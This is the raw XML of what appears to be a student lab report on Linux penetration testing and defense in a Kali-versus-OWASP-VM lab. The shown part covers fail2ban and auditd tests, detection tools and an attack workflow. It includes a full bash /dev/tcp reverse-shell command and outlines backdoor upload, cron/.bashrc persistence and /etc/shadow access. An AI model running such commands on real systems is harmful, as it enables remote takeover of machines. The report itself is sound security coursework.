    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Defense Test 1: fail2ban SSH brute-force block</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Install: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apt install fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Config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/etc/fail2ban/jail.local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):</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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[sshd]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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port = ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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maxretry = 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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bantime = 600</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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findtime = 600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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:u w:val="none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Test: After 5 failed SSH login attempts → IP blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Defense Test 2: auditd detect backdoor behavior</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Install: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apt install auditd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105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Add rule: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auditctl -a always,exit -F arch=b64 -S execve -k suspicious-exec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Simulate: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bash -i &gt;&amp; /dev/tcp/192.168.1.1/4444 0&gt;&amp;1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Query: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ausearch -k suspicious-exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0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b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IX. Extended Design &amp; Attack-Defense Integration</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="89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300"/>
        <w:gridCol w:w="5655"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3300"/>
            <w:gridCol w:w="565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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Tool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ind w:left="720" w:hanging="360"/>
              <w:jc w:val="center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Function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ind w:left="720" w:hanging="360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Tripwire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ind w:left="720" w:hanging="360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File integrity comparison (before/after intrusion).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ind w:left="720" w:hanging="360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ClamAV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ind w:left="720" w:hanging="360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Detect downloaded backdoors; daily scans.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ind w:left="720" w:hanging="360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Rkhunter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ind w:left="720" w:hanging="360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Detect rootkits, abnormal services/backdoors.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ind w:left="720" w:hanging="360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MITRE ATT&amp;CK Mapping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ind w:left="720" w:hanging="360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e.g., T1059.004 (Unix Shell), T1053.003 (Cron).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8cezne2vtdb9" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">X. Presentation Suggestion – Dual Perspectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Attack Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115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Reverse shell connection (bash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/dev/tcp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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116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Upload &amp; execute backdoor.sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117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Establish persistence (.bashrc, cron).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118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Attempt privilege escalation, access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/etc/shadow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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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Defense Validation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A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fail2ban blocking SSH brute-force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B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auditd detecting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/bin/bash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 execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C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tripwire detecting sensitive file changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D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logwatch summarizing anomalies daily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E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firewall blocking unauthorized ports.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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.Work Allocation &amp; Gantt Chart</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="958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570"/>
        <w:gridCol w:w="1605"/>
        <w:gridCol w:w="1005"/>
        <w:gridCol w:w="3405"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3570"/>
            <w:gridCol w:w="1605"/>
            <w:gridCol w:w="1005"/>
            <w:gridCol w:w="3405"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1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jc w:val="center"/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Task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jc w:val="center"/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Date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jc w:val="center"/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Person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jc w:val="center"/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Note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VM setup &amp; network config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2025/06/30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Leader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NAT &amp; IP mapping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Shell script writing &amp; testing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2025/06/30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Leader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Bash + Netcat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Penetration workflow &amp; documentation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2025/06/30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Leader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Attack &amp; privilege extraction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Report writing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2025/06/30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Leader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With screenshots &amp; flowcharts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.Problems Encountered &amp; Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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7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70"/>
        <w:gridCol w:w="6435"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3270"/>
            <w:gridCol w:w="643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jc w:val="center"/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Problem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jc w:val="center"/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Solution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HTTP server stuck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Keep window open while target downloads file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Netcat listener inactive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Verify reverse shell executed, check firewall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ENOENT errors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Use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strace</w:t>
            </w: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 to trace missing files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9.Equipment Requirements</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>
        <w:tblW w:w="96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640"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="5745"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2640"/>
            <w:gridCol w:w="1275"/>
            <w:gridCol w:w="5745"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1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jc w:val="center"/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Item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jc w:val="center"/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Qty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jc w:val="center"/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Purpose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Kali Linux VM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Launch attacks &amp; control target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OWASP VM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Target system for testing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Network connection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Internal network for attack/comm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.References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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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Offensive Security – Kali Linux Documentation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
            <w:b w:val="1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https://www.kali.org/docs/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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OWASP Broken Web Applications Project</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
            <w:b w:val="1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https://owasp.org/www-project-broken-web-applications/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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Netcat Command Guide</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
            <w:b w:val="1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https://linux.die.net/man/1/nc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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480" w:right="0" w:hanging="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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HackTricks – Linux Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
            <w:b w:val="1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https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="48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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux Penetration Testing and Exploitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Publishing House of Electronics Industry (Chinese edition)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId15" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait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DFKai-SB"/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5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6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480" w:hanging="48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spacing w:after="180" w:before="180" w:line="720" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="5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Normal"/>
  </w:style>
  <w:style w:type="character" w:styleId="a0" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority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header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00865F3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4" w:customStyle="1">
    <w:name w:val="頁首 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00865F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00865F3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6" w:customStyle="1">
    <w:name w:val="頁尾 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00865F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00B150FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00180746"/>
    <w:pPr>
      <w:ind w:left="480" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="002D56D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 w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="002D56D8"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:color="auto" w:fill="e1dfdd" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10" w:customStyle="1">
    <w:name w:val="標題 1 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004C3707"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:kern w:val="52"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52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kali.org/docs/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/nc" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-broken-web-applications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footer" Target="footer1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation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moFBZWM4s3+Y/zC3ND3cJm1WIJQ==">CgMxLjAyDmguYW8xODNlYW9iZDk4Mg5oLnRqOGVvZXQxZnJsZDIOaC53ZTI5czJtdnd6cmgyDmguMjVwdnhkcXp2a2JmMg5oLnQzdW96OTdxaDJtMjIOaC50YmsycHhnY2Y0NjkyDmgucWs4OWg2d3UxbmhxMg1oLnVnbGhjOHFnOWZ2Mg5oLnQ5YWpwb2t5cXF4cjIOaC5xenZ1ZmJ3NnY3bDMyDmguZjB4bXZhamtkZmgwMg5oLmx4aHUwdjZpazVucDIOaC5seXo5ZjJ0MGh1ZDYyDmguOGNlem5lMnZ0ZGI5OAByITFZYTBUM0xEMG42Uktpc2RVLW8yVjdTY3gwUEJzWllQT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2025-06-26T11:02:00Z</dcterms:created>
  <dc:creator>CSIE</dc:creator>
</cp:coreProperties>
</file>